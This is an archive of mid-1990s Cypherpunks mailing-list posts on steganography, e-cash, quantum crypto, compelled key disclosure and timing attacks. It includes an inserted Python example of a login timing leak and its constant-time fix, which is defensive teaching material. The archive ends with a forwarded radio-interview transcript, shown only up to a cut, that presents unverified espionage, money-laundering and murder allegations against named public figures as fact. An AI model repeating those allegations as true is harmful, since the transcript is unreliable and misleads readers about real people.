To: A&SUser%cctr.umkc.edu@genie_1.toad.com (A&SUser)
Subject: Re: Pornographic stories
In-Reply-To: <8043943A02502C79@-SMF->
Message-ID: <8143943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


Stop posting this type of crap on the Internet.  People like you are the 
ones to get everyone censored.

Hopefully everyone else will flame you a thousand times over




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 13 Dec 1995 11:33:05 +0800
To: cypherpunks%toad.com@genie_1.toad.com
Subject: <None>
In-Reply-To: <E243943A02502C79@-SMF->
Message-ID: <E243943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


A long time ago, I read about a program that would take a picture, and
replace the LSB of every pixel in the picture with your message.  I'm
wondering, is the source code for this program available anywhere on
the net???




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Wed, 13 Dec 1995 05:53:42 +0800
To: cypherpunks%toad.com@genie_1.toad.com
Subject: EXON
In-Reply-To: <E343943A02502C79@-SMF->
Message-ID: <E343943A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


Could someone please explain to me what this "EXON" thing is??




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@bamako.CS.Berkeley.EDU (David A Wagner)
Date: Wed, 13 Dec 1995 11:33:56 +0800
To: cypherpunks@toad.com
Subject: Re: More FUD from First Virtual [NOISE]
In-Reply-To: <0kn1Q6CMc50e02irtU@nsb.fv.com>
Message-ID: <199512112215.RAA13271@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <0kn1Q6CMc50e02irtU@nsb.fv.com>,
Nathaniel Borenstein <nsb@nsb.fv.com> wrote:
> It's fundamentally different because FV (unlike all the other systems,
> to my knowledge) is a "closed loop" financial instrument.
     [ ... FV is inherently harder to crack than systems which actually
           use encryption, etc. etc., NB claims ... ]

Is it just me, or does this sound like a challenge?

Personally, I'd much rather see a true e-cash system (like Digicash's)
succeed than some pay-by-cleartext-email non-anonymous system.

Maybe Sameer will create a Hack FV page :-)

Or maybe NB will offer a $1000 bug bounty to anyone who can successfully
forge a transaction in FV's system (since it's so foolproof)...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMMytkyoZzwIn1bdtAQEY+AF/bGZOi37IlT0LTWz8zhMFM4JqZ2iSchrm
Z3abBPc1MZxxDuG06NT3FCft9+eM13Fb
=yXp4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 13 Dec 1995 05:54:07 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem
In-Reply-To: <9512111557.AA09207@envirolink.org>
Message-ID: <199512112229.RAA27787@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Munster writes:
> Ok, here was the method of key generation i was talking about.  With the light 
> communications, the idea was to use photons whose waves pulsed in certain 
> directions (up/down, left/right, and diagonally) to create a way to communicate 
> much like morse code.  

Right, this is the main quantum crypto idea of Brassard et al. (See for
example _Applied Crypto_ v.1 pp.408-410)

[...]
> but since the contents of the key were never 
> touched on DIRECTLY, no eavesdropper could determine the key, 

No, the integrity of the system really depends upon the quantum properties
of light. Among other things, Heisenberg's Uncertainty Principle makes it
impossible for Eve to "eavesdrop" on the photons without affecting them
measurably.

[...]
> however, if one was to use the orientation symbols in one's 
> messages, as if they were being beamed, but in an email message instead, one 
> could make use of the simple key, and the simple game of '20 questions' to 
> generate a totally secure key 
[...]

In this situation Eve can read the email traffic without modifying it, so the
game is up.

-Futplex <futplex@pseudonym.com>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Thu, 14 Dec 1995 12:50:39 +0800
To: cypherpunks@toad.com
Subject: Mike Godwin Re: Is there a lawyer in the house?
Message-ID: <9512120257.AA14501@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Mike Godwin <mnemonic@well.com>
Subject: Re: [Black Unicorn: Re: Is there a lawyer in the house?]
Date: Mon, 11 Dec 1995 13:27:34 -0800 (PST)
 
> The question is whether the government can legally compel production
> of your encryption key(s) if you give them to another person, such as
> an escrow agent of your choice, your lawyer, your wife, your bank,
> your web site provider, or whoever.

Compelling the key from the person you gave it to is easy. (That is,
the answer there is yes, assuming no independent claim of non-Fifth
Amendment-derived privilege.)

Whether you have given it to another person does not automatically make it
easier to compel the key from you. But under certain circumstances (and
in certain jurisdictions) it might -- such as if, for example, you were
relying on a "last link" rule to bar your disclosure of the key. If you 
were arguing that the disclosure of the key would be a "last link" in a
chain of inculpatory causation, and it could be shown independently that
you had already disclosed the key to someone else, thereby proving that
you possessed the key at one time, your having done so might undermine
your "last link" argument.

Feel free to forward this.

--Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 14 Dec 1995 12:50:52 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512112111.NAA02653@mage.qualcomm.com>
Message-ID: <9512120054.AA05216@all.net>
MIME-Version: 1.0
Content-Type: text


The timing of cryptosystems to get keys is a special case of covert
channels, and it is not correct to claim that trusted systems (ala the
TCSEC) fail to account for this.

The problem with covert channels (including timing channels such as the
one that gets key material) runs pretty deep.  For example, Shannon's
theory says that for any finite amount of noise, we can always send
information through such a channel at a bandwidth dictated by the signal
to noise ratio.  Furthermore, any time a computational resource with
known characteristics is shared in a way that depends on a secret in any
way, that secret is leaked through the covert channel associated with
the shared resource. 

So the difference between processing a one and a zero even in many forms
of multiplication can be used to determine characteristics of many secret
processes.

	Example: a valid password results in a different execution time
	than an invalid one -> enough statistics, and you can find the
	password.

	Example: a valid UID with an invalid password takes a different
	amount of time than a valid UID with the same password -> enough
	statistics and you can find valid UIDs.

	Example: a transaction worth $1,000 takes a different amount of
	processing time than a transaction for $2.95 -> enough statistics
	and you can figure out which messages are worth breaking.

	Example: usage characteristics change just before major stock
	changes occur -> enough statistics and you can predict when the
	share price will change dramatically.

If you are willing to spend enough effort characterizing these things,
no system with information-dependent shared resources (e.g., the
Internet) can hold its secrets (a bit of poetic license there). 

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
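
Added example, not part of the message above: the UID-probing case from Cohen's list, shown as a login check that skips the expensive password derivation for unknown UIDs beside one that does the same work either way. The account data, function names and round count are constructed assumptions, and work is counted in key-derivation calls rather than measured by clock so the result is repeatable.

```python
import hashlib
import hmac
import os

KDF_ROUNDS = 20_000   # constructed value, kept low so the example runs fast
kdf_calls = 0         # counts expensive derivations, the timing-relevant work


def derive(password, salt):
    """Slow password hash; each call is the dominant cost of a login."""
    global kdf_calls
    kdf_calls += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ROUNDS)


def make_record(password):
    """Return (salt, derived key) as it would be stored for an account."""
    salt = os.urandom(16)
    return salt, derive(password, salt)


USERS = {"alice": make_record("correct horse")}   # constructed sample account
DUMMY = make_record("placeholder")                # stand-in for unknown UIDs


def login_leaky(uid, password):
    """Returns early for unknown UIDs, so they answer faster than known ones."""
    record = USERS.get(uid)
    if record is None:
        return False                 # no derivation performed
    salt, stored = record
    return derive(password, salt) == stored   # == is not a constant-time compare


def login_uniform(uid, password):
    """Does one derivation and one constant-time compare for every request."""
    record = USERS.get(uid)
    salt, stored = record if record is not None else DUMMY
    candidate = derive(password, salt)
    matches = hmac.compare_digest(candidate, stored)
    # A match against the dummy record must never authenticate anyone.
    return matches and record is not None


def work_for(login, uid, password):
    """Run one login attempt and report (result, derivations performed)."""
    before = kdf_calls
    result = login(uid, password)
    return result, kdf_calls - before


if __name__ == "__main__":
    for fn in (login_leaky, login_uniform):
        print(fn.__name__,
              work_for(fn, "alice", "wrong"),
              work_for(fn, "mallory", "wrong"))
```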




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Thu, 14 Dec 1995 12:51:43 +0800
To: cypherpunks@toad.com
Subject: Re: Timing Attacks
Message-ID: <9512120216.AA03191@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
> 
> I'm not so sure I see the great usefulness of this attack.
> 
> I've taken a cursory glance at Mr. Kocher's paper on-line and what it 
> comes down to essentially, if I understand it correctly, is that you need 
> to be as sure of the timing as you can be.
> 
> Now, on a distributed system, you can't measure those timings, because 
> any latency  could come from the originating computer, the links in the 
> middle or any combination of them.

But, what if one of the computers is connected on a "hostile" lan.
For example - your typical student PC running in a grad-student office
or on the network in the dorms.  Sniffing packets from it shouldn't be
too hard (yes, good ethernet concentrators make it harder - but not
impossible).  These packets will give you the necessary timing information.

> Also precise timings can be limited by fluctuating load averages amongst 
> other things in a time-sharing computing environment.  While this might 
> work in a lab, with the current advances in computing speed, the 
> differences between a fast and a slow calculation can easily be opaqued 
> by network lag.
> 
> Am I missing something, or does this attack only work in a lab?

What if that is a PC running Windoze or single-user Linux?  Then there
aren't likely to be fluctuating load averages.  The adversary is
close to the one end, and away you go......

Of course, targeting a server is much more practical in terms of what
you may gain access to.  Several congested network hops will generate
lots of delays, BUT what about the 4:00am hit from the dialup terminal 
servers that happen to be on the same ethernet as the secure server.
This would be a normal situation for many ISPs.

All of that said - I think that this is more practical in the "lab"
than on the net.  But, it is a very clever approach to the
problem of cracking a crypto system.  It serves us all a good example
that we need to leave NO stone unturned when examining a system.

Dan

------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gibo@ripco.com (Giles Bowkett)
Date: Thu, 14 Dec 1995 12:49:50 +0800
To: cypherpunks@toad.com
Subject: Timing Attack Paper
Message-ID: <v01530501acf1028a30f2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I went to

http://www.cryptography.com/timingattack.html

and found the whole thing to be totally incomprehensible from
a layman's point of view.  I apologize for having not read
"Applied Cryptography", which might have made the abstract a
simpler read - but even if I had I'd have been baffled by a
lot of the terminology and equations in this paper.

Can anyone post a brief summary which explains the essential
workings of the attack?  I'd be very grateful.

--giles

===========================>>>http://pages.ripco.com/~gibo

as long as I shall stay alive
I never want a nine to five

-----BEGIN PBP SIGNATURE-----
Version: 1.0.0, Copyright 1995, Pretty Bad Privacy

Giles Bowkett
gibo@ripco.com

I am who I am because I say so.  So there.
-----END PBP SIGNATURE-------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon.roland@the-spa.com (Jon Roland)
Date: Wed, 13 Dec 1995 05:27:48 +0800
To: ca-firearms@shell.portal.com
Subject: Jim Quinn interview of James Norman (edited)
Message-ID: <199512120247.SAA12705@nova.unix.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have further attempted to edit the interview transcript, cleaning up
spelling, punctuation, and occasionally guessing what was probably taken
down wrong, from context, (and without the benefit of hearing the actual
interview tape).
============================================================================

The following is a Radio Interview between James Norman, 
formerly Senior Editor of Forbes Magazine and now with Media 
Bypass Magazine and Jim Quinn, DJ of WRRK 96.9 FM in Pittsburgh. 
In this interview from December 7th, they discuss issues of 
national importance and STUNNING IMPACT. Essentially they give 
out the reason for Vincent Foster's Death, and the fact that 
the "resignations" of the Congresspersons are NOT for policy 
reasons but because they have been caught with millions in 
corrupt funds in Swiss Banks. Read this to learn what the 
"mainstream media" doesn't ever tell you... 


Quinn's Interview with Jim Norman
 
QUINN: Jim Norman, former Senior Editor at Forbes Magazine, and 
currently writing for Media Bypass Magazine after having 
uncovered Caspar Weinberger's Swiss bank account (we do get 
punished for some of the truths we uncover, do we not?). Jim is 
on the phone with us this morning. Good Morning, Jim. 

NORMAN: Hi, how are you? 

QUINN: Pretty good. I want to give people a chance to get an idea 
of what it is we are going to launch into after 8 o'clock, and I 
want to give some background into this. Is it fair to say that 
since Iran-Contra that the government has sort of been involved 
in the drug business? 

NORMAN: Yes, it goes way back before then, actually. It goes back 
even to the Vietnam War days -- remember the Golden Triangle, 
Laos, Cambodia and all that, Pakistan and Afghanistan, but it was 
always on a much smaller scale. What apparently happened was that 
in the 80s we got into it in a big way, basically nationalizing 
the wholesale importation of drugs from Central and South America. 
The idea was that we control it somehow that way; instead, it has 
just become the tail wagging the dog, I think. 

QUINN: It's become the funding source for just about anything 
that the government covertly wants to do, and for the moneys that 
various elements of the government don't want to ask the Congress 
for, nor do they want Congress to know about. 

NORMAN: Right. And it's an arms business, too. They are kind of 
all tied up together. 

QUINN: So it's arms and drugs? 

NORMAN: Right. 

QUINN: Kenneth Starr is currently our Whitewater prosecutor, and 
I have long said on this show that I find Ken Starr interesting 
but also troubling in that there are many elements to the 
Whitewater scandal. Part of the laments have to do with banking 
and have to do with Madison Savings and Loan, check kiting, stuff 
that went on with the Arkansas Development Financial Authority, 
but basically there are really two elements -- there is Whitewater 
and then there is all the stuff with Mena Airport, Iran-Contra, 
drugs into the country, various unexplained deaths, one of them 
Vince Foster, the possibility of espionage on the part of the 
first lady, and all of this lies behind a brick wall that Mr. 
Starr has been positioned upon to make sure that they get Clinton 
but that the fire doesn't burn past that wall; because on the 
other side of that wall are Republicans and Democrats. Am I right? 

NORMAN: That's right. He is not looking at Mena; he doesn't have 
the authority to from Janet Reno. He does have authority to look 
at the Vince Foster death, but I think only inasmuch as it relates 
to the Whitewater situation. The whole thing is hemmed in and 
beyond that is this whole national security blanket that has been 
thrown over big parts of this thing that you couldn't touch if you 
wanted to. 

QUINN: It's interesting, I find, that Dr. Henry Lee, who was part 
of the defense team for the Simpson trial, has ended up working on 
the Vince Foster affair. The word that I get is that he is going 
to say it was indeed a suicide. You have to remember something 
about Dr. Henry Lee -- he was, oddly enough, the guy that was 
called in to do some work on the Danny Casolaro death down in 
Martinsburg, way back in the early nineties. Was it 1991? 

NORMAN: I think it was 1991. 

QUINN: This was that reporter that you may have heard about that 
was found dead in a motel room, supposedly from a self-inflicted 
wound, even though the papers (a year's worth of investigative 
reporting) were all missing. He was working on the story that he 
called the "octopus" and basically it's the same story that you 
are working on, isn't it?
 
NORMAN: Yes, I know I'm talking to a lot of the same sources. 
Danny supposedly slashed his wrists twelve times, sometimes deep 
enough to cut the tendon. 

QUINN: Yeah, right. And his files were all missing. Sure, 
there's a suicide. Right. And they embalmed his body before they 
even had a chance to inform his parents that he was dead. So it's 
another "Arkanside." 

NORMAN: George Williamson, who is an investigative reporter out 
of San Francisco, has been working on that. He has come up with 
all kinds of stuff -- other witnesses that have disappeared, 
people in the hotel who just aren't there anymore -- disappeared 
mysteriously. 

QUINN: It's interesting. There are a lot of people who are 
witnesses to various deaths involved with this Arkansas crowd, 
Danny Casolaro for one. Also, the two young boys on the railroad
tracks down in Arkansas who stumbled on the drug operation. A lot 
of the witnesses around that have met violent and untimely deaths 
as well. So here are a great deal of ugly people involved in 
this. We are going to get down to what it all means in terms of 
government corruption and scandal of immense proportions that 
touch both parties. This is really nonpartisan. The fact that I 
don't happen to like "President Pantload" doesn't have a whole 
lot to do with this; he was just sort of a guy who happened to be 
there with his hand out at the time. It all goes back to the late 
70's, right Jim? 

NORMAN: Yeah, and even before that. Let's start with the early 
80s when Bill Casey came into office in the CIA under Ronald 
Reagan. That's when our government decided to embark on this 
amazing and extremely unbelievably successful effort to spy on 
the world's banks. We did it! We have been spying on world 
banking transactions for more than a dozen years. The way we do 
it is by basically forcing foreign banks, wittingly or 
unwittingly, to buy bugged software and bugged computers that 
let our NSA (National Security Agency) which is the intelligence 
arm of the government, to basically surveil wire transfers all 
over the globe.

QUINN: Let me ask you this. How do you sucker the rest of the 
banking community around the globe into buying the software 
that you are selling? 

NORMAN: First of all you sell to front companies like this 
company Systematics in Arkansas, now called Alltel Information 
Services. They had another company called Boston Systematics,
an affiliate based in Israel mainly. There is Robert Maxwell, the 
UK publisher, who is fronting this stuff. There are a whole bunch 
of people fronting this.
 
QUINN: Wait a minute, Robert Maxwell -- isn't he dead? 

NORMAN: Yeah, he is now. 

QUINN: Didn't he have an unfortunate accident? 

NORMAN: Fell off his yacht in the Atlantic Ocean somewhere. 

QUINN: Why, isn't that amazing! 

NORMAN: The tinkering of it was mainly putting back doors, just a 
few lines of code, that would allow somebody to dial into a 
computer without leaving any footprints, any audit trail that 
you were in there. Then you could go around and look around in 
files or you could collect information from a system without the
user even knowing it.

QUINN: Now this software, which was originally called Promis, 
was stolen from a company called Inslaw by the Justice 
Department. It ended up somewhere, probably at E-Systems
or somewhere, and it was converted into banking software. It 
started out as software designed to track prosecutorial cases
around the country. My question is -- why didn't Ed Meese just 
pay the damn bill, and none of this would ever have come to 
light! Danny Casolaro was chasing the stolen software when he 
stumbled on what it was being used for. 

NORMAN: Well, the trouble with it was that they bought it for use 
in the Justice Department, but they were going to use it all over 
the place. If they were paying royalties on it, Inslaw would know 
just how extensive the use was of the software, and they didn't 
want people to know how extensively it was going to be used. 

QUINN: I see... 

NORMAN: Plus, a lot of the profits from the resale of this went 
back into private profits. It was customized and resold to the 
intelligence community. It became sort of a basic platform 
database tracking system for most of our intelligence agencies 
and many of those abroad. The idea was "Well, we can all talk to 
each other now." In fact what it has allowed us to do is 
basically rifle through other people's data files abroad too, 
because the stuff was apparently being sold to foreign 
intelligence agencies and it was also bugged. We have other ways 
of basically surveilling and downloading foreign electronic 
databases. The whole computer world is much more porous and 
transparent than anybody wants you to believe. 

QUINN: There is a bank here that I know that uses this software 
right here in this town, and I'm sure that there is probably more 
than one. Everybody's got it.

NORMAN: In some form or another. It goes under different names 
now. It's been modified many times. I think when Inslaw had it, 
it was a half million lines of code. I'm told now it's a couple 
of million lines anyway. It's gone through many, many 
modifications over the years. 

QUINN: This company, Systematics, which is I believe still 8% 
owned by Jackson Stevens at Stevens Inc., who, by the way, is one 
of the backers of Bob Dole -- how troubling is that? 

NORMAN: He is the co-chairman of Dole's finance committee. 

QUINN: That's right! Bob's in town -- Hi Bob -- You'd better 
explain this. You'd better explain Mena, too, Bob, or it's going 
to follow you to the White House. Systematics, I understand, had 
an attorney who was kind of off the record doing work for them, 
named Vince Foster. Is that true? 

NORMAN: Yep, that's true. We've heard that from many, many 
sources now. In fact, Jim Leach's committee has established that 
pretty well with some of the investigation that they have done. 
Foster was a trusted deal guy for Stevens at the law firm. 
Although Foster never shows up officially as an attorney of record 
for Systematics, he was definitely in the loop, basically 
smoothing out things between Systematics and the NSA, which was 
the main government agency that was contracting for a lot of this 
stuff. 

QUINN: So this is how Foster got involved in intelligence, right? 

NORMAN: Yes, because there is heavy duty code and computer 
technology stuff involved here. Apparently, some time in the 
early 80s he developed this relationship with the State of 
Israel. In fact, some of the same handlers I am told were 
involved in the Jonathan Pollard case. They basically nurtured 
him and groomed him for many years and then bingo, they hit the 
jackpot -- he ended up in the White House. Apparently he 
convinced Hillary to help him out on some stuff. 

QUINN: So... what is Foster involved in? It's the mid 80s... 

NORMAN: Mid 80s. Foster is at the Rose Law Firm. Think of him as 
a high-level marketing guy between Systematics and the NSA. 
NSA -- they have all these spooky contracts that they are trying 
to find contractors for. Foster would have been sort of a 
go-between there. Plus Hillary was actually an attorney of record 
for Systematics back in 1978 when Stevens tried to take over the 
Financial General Bank shares in Washington. Those bank holding
companies later became First American - Clark Clifford, Robert 
Altman, all that crowd. 

QUINN: Yeah, the BCCI thing. 

NORMAN: Stevens was fronting for the BCCI crowd and trying to 
take over this Washington Bank Holding Co. The SEC blocked him at 
the time, partly because one of the things he was insisting on 
was that this company Systematics, which at that time was a tiny 
little thing in Arkansas, he was insisting that they be brought 
in to do all of the data processing for this multistate bank 
holding company in Washington. Hillary represented Systematics
in that. Now the thing about Systematics at the time -- it was 
before they even got involved with the bank spying stuff. Abroad 
for many years, they had been what amounted to a laundromat for 
covert funds for the CIA and the intelligence community, quite 
legally, probably. It was done for the national interest. 
Somebody had to move this money around and Systematics was in a 
perfect place to do it because they owned the computers and a 
whole bunch of small banks. They could move this money around 
electronically without the bankers even knowing about it 
necessarily, and it wouldn't go through the normal clearing 
houses. The regulators wouldn't see it. It would just crop up 
wherever the CIA needed it in whatever bogus front company 
account, and it was all just bits and bytes; it was a cyberbank 
-- it still is. 

QUINN: I'm here with Jim Norman, former Senior Editor at Forbes 
Magazine. You know, it's interesting, here is a guy who was with 
Forbes Magazine, a respected senior editor who figured probably 
this would be his life's work. All of a sudden, he finds himself 
a defrocked commando journalist working for Media Bypass Magazine 
out of what? Evanston, Illinois, or somewhere in Indiana? 

NORMAN: Indiana. 

QUINN: Yeah, that's right. Now, I've got a question. Before we get 
into Vince Foster in the mid 80s and Hillary Clinton's role in 
this, how did you get onto this whole scandal? Where did you walk 
through the door on this? 

NORMAN: I came in the back door completely. Look, I had no ax to 
grind here against Bill Clinton or the Administration. I hated 
covering politics. I thought it was all baloney. I'm just a 
business writer, and I never wanted to get enmeshed in this whole 
Whitewater/Vince Foster thing, but it started -- for a couple of 
years I had been following this oil company bankruptcy up in 
Stamford, Connecticut, because I had covered oil. This thing 
never made sense to me. There is no reason why this company went 
bust and, in fact, when I actually got into it and started redoing 
the oil trading transactions, the reason they lost money: they 
weren't losing it. They were hiding it. They were parking it off 
shore with another company that was financing arms sales to Iraq, 
cluster bombs and stuff like that all through the 80s. And, this 
Chilean arms dealer, Cardone, who was providing weapons, was also, 
it turns out, brokering some of the sales of this stolen software. 
Okay, that gets me into the software story. 

QUINN: So that gets you onto the Promis software, and you and 
Danny Casolaro are now on the same road. 

NORMAN: Right, and then in the process of that, I started talking 
to a whole bunch of rather spooky, strange intelligence community 
characters, and I was sitting at a guy's living room down in 
Kentucky one day. He was sitting there in the middle of the night 
blowing smoke rings, and he said, "Yo, by the way, Vince Foster, 
he was under investigation." I said, "Under investigation, for 
what?" And, he said, "Well, it's spelled 'Espionage.'" BOINK!!... 
and that's how I got on this whole Vince Foster thing. 

QUINN: So that's how it happened? 

NORMAN: Yeah. 

QUINN: Okay, now here it is, the mid 80s. Vince Foster is working 
for Systematics, and he is coming into contact with the 
intelligence community. What is, how did Hillary Clinton and the 
Israeli Mossad and all of this come together and what happened? 

NORMAN: Well, I think that they had been... look the Israelis were 
key partners with us in this bank spying effort. This is a joint 
allied government effort, and the Israelis were one of the key 
front people in this, in selling and supporting this software all 
over the world, so that people weren't thinking they were getting 
the software directly from the U.S. You know, there was an 
Israeli front company used to sell this stuff to foreign banks. 

QUINN: Well, they sold it to the Moscow bank. I know that. 

NORMAN: Well, Systematics did, yeah, and Systematics got involved 
in supporting this stuff all over the world, a little company in 
Arkansas... Go figure. Come on. 

QUINN: Yeah, really. 

NORMAN: I mean, main software people, they operate in New York 
and places like that and not out of Podunk, Arkansas. So, at any 
rate, the Israelis had ties into this whole thing all along, and, 
you know, they are our friends. We do give them a lot of stuff 
and share a lot of stuff. 

QUINN: Well, the whole idea was to track terrorist money, and the 
Israelis have a great interest in that, and rightly so. There is 
no problem here. 

NORMAN: The name of this problem was "follow the money for 
terrorist reasons," but once you set that up, you can do all 
kinds of stuff with it. I mean, we were spying on everybody's 
money. I think that's probably how we helped bust the Soviet 
Union. We found out just how deep their pockets were, where their 
money was, who we could bribe. You know, acting as a financial 
destruction of their society more than anything. 

QUINN: So, how does Foster get involved in espionage? 

NORMAN: Well, I think it was money. Money, money, money. And, 
especially you know with this whole political thing, it takes so 
much money to run for office. I mean, my theory is that the 
actual spending is probably twice of what anybody declares when 
you add up all of the soft dollars and everything. I think there
is a tremendous need for money there, and they just weren't real 
cautious about where it was coming from. I think this thing about 
selling state secrets to the Israelis and other countries was 
just a business. It was just for money. I don't think there was 
any ideology involved here at all, and it was one of many 
businesses. There is also insider trading going on here. There 
was the kickback on drugs and arms stuff and so the money has to 
go... you have to hide it some way, so it goes into Swiss bank 
accounts. And Foster would have known that, yeah, we're tracking 
this money off shore, but there is such a blizzard of information 
that unless somebody knows exactly what they are looking for they
would never find anything. They thought they could cover this up 
pretty well so Foster had... actually he had several accounts, and 
there was one in particular in this bank, bank at Villa Switsaria 
Italiano in Chaso on the Italian border. It is a little kind of a 
Mafia kind of community there reputed, and so he was taking the 
money in there for the payments from the Swiss. He was going to 
Geneva every six or eight months, and his curious one-day trips --
I don't think it was for sightseeing. 

QUINN: No. I'm sure he wasn't doing any real estate work for 
Arkansas. 

NORMAN: No. The whole thing about money laundering is... you know 
the money would go into a Swiss bank. Somebody would have to go 
physically and take it out and take it to a friendly bonded dealer 
or something like that, buy bearer bonds or other kinds of bonds 
or something that you could pledge as collateral for loans back 
in the states and turn it back into cash again legitimately, and 
so that is how money laundering works. Vince, in effect, was a 
bag man here because when they go to the White House all of a 
sudden they hit the jackpot. There was so much more goodies there, 
and, in fact, Deborah Goram, Foster's executive assistant, 
testified under oath that Foster had given her two, inch-thick 
ring binders from the National Security Agency to put in Bernie 
Nussbaum's safe in the White House. What were these binders? Well, 
I have talked to brokering experts on this stuff, and they say, 
"Look, when you are talking NSA binders in the White House, you 
are talking mainly one thing, and these are the codes and 
protocols by which the President authenticates himself when he 
has to call up the Pentagon to say 'let's go nuke somebody'." Now, 
what was Foster doing with these things? He had no business with 
them. He would have had no access to them. It would have to come 
from somebody with access to the Oval Office or the Presidential 
living quarters. 

QUINN: And, who would that be? 

NORMAN: Well, I think we know who we are talking about here. 

QUINN: We're talking about Hillary Clinton, aren't we? 

NORMAN: That's right. She has been under investigation in this 
whole thing, too, but I think that they had a strong case against 
Vince and not such a strong case against Hillary. But, you see 
what happened was, and this is another whole part of the story as 
to how they got onto Foster. Basically, there was a team of
computer hackers and computer intelligence guys in the CIA who 
were going through most databases. They found names there that 
they identified as being Foster and Hillary. They put them under 
surveillance actually before they went to the White House. I think 
it was between the election and the time that they went to the 
White House, and that's when the alarm bells went off. They had 
been surveilling these accounts for a while, and when Foster on 
July 1, 1993, bought a ticket to Geneva, a round-trip one-day 
ticket to Geneva, these guys said, "Oops, he's going to take the 
money. We're going to beat him to it." And, they went in. They 
hacked their way into the bank and obtained the necessary
authorization codes on this coded account for which no signature 
is required to withdraw money, by the way. 

QUINN: Right. 

NORMAN: They were able to effect their own technically legitimate 
wire transfer of this money back to the U.S. Treasury, where it 
sits in a holding account escrowed for use by the CIA. 

QUINN: So, the CIA empties Vince Foster's Swiss bank account of 
its ill-gotten money. 

NORMAN: Yeah, actually it wasn't the CIA. It was this sort of 
renegade vigilante group of guys they called the Fifth Column 
that has been out doing this stuff. They don't take any of the 
money for themselves. The money goes to the... 

QUINN: They just do it for fun? 

NORMAN: The CIA only gets the money. It is escrowed for use by 
the CIA but only when the CIA gets rid of a bunch of its bad 
apples there who've got dirty hands from drug kickbacks, arms. 

QUINN: Let's pick this story up. There was a meeting just before 
Vince Foster died on the eastern shore of Maryland in which 
Webster Hubbell, Vince Foster, and some others were present. 
Okay, this was just before Foster died. Pick up the story here. 

NORMAN: All right. Well, we mentioned July 1, 1993. Foster buys 
this round-trip ticket to Switzerland. They raid his account. 
They take out $2.73 million. Foster apparently calls up the bank 
to let them know he was coming. They say, "Oh, Vince don't you 
know you took the money out already?" Boing... that's when he
found out he was under investigation. That's when he got so 
mysteriously depressed. It had nothing to do with editorials in 
the Wall Street Journal. He had his bank account raided big time, 
and he knew he was under surveillance, or he knew he was under 
investigation. And, that started this curious chain of events. 
Webster Hubbell testified that not so much Vince was depressed, 
but he was worried. He was afraid to use the White House 
telephones. The guy had heart palpitations. He couldn't sleep at 
night. His doctor gave him a prescription for sleeping pills. His 
sister tried to get him to talk to some psychiatrist. He never 
got in touch with them. Instead, he hired a high-powered lawyer 
in Washington, Jim Hamilton, this big deal white-collar crime 
fix-it guy who handles people who get hauled up for Congressional 
hearings. And, then there is this curious meeting the weekend 
before Foster died. He and his wife, Lisa, go down to the eastern 
shore of Maryland for a getaway weekend, and then, by coincidence, 
they meet Hubbell and his wife down there. Hubbell, also from the 
Rose Law Firm, at the time the country's de-facto top law 
enforcement law officer because Janet Reno in effect was taking 
her orders from Hubbell. They go over to the estate of Michael 
Cardoza, who is the son-in-law of Nathan Landau, a big deal 
Democratic fund-raiser, and Cardoza is also the head of Clinton's 
legal defense fund. Supposedly, this was all poolside chit chat.
Baloney, it was damage control. They were trying to figure out 
how to contain this scandal from spreading to other people in the 
White House, and they were trying to lean on Vince to get him to, 
you know, cop a plea, go quietly, or shut up and don't talk about 
it. And, in fact, what my sources have told me is that there was 
actually a huge payment made to an account held by Lisa Foster, 
with more than $286,000, on the Friday before that meeting. 

QUINN: Wait a minute, on the Friday before that meeting, Lisa 
Foster's bank account gets a deposit of $286 million? 

NORMAN: $286,000, yeah. 

QUINN: I'm sorry, yeah, $286,000. Okay, so does she take it out? 

NORMAN: Well, I don't know what ever happened to that money. It 
is hard to tell where it came from even. It is all very 
mysterious to me, but it sure smells like hush money to me. It's 
like, "Look Vince, don't worry, we'll take care of your money." 

QUINN: You don't know if she wrote a check on it?

NORMAN: Well, I'm told that it came through the hands somehow of 
Sheila Anthony, who was Foster's sister, and at the time she was 
a "congressional liaison" person at the Justice Department, 
whatever a congressional liaison is. 

QUINN: So she takes the money to Foster, and Foster turns it down? 

NORMAN: Well, no... I think he probably accepted it, or it went 
there. But, apparently, he was having second thoughts, I think. 
You know, on the Monday after they came back from this meeting, 
the records showed, the public records showed, that he has a 
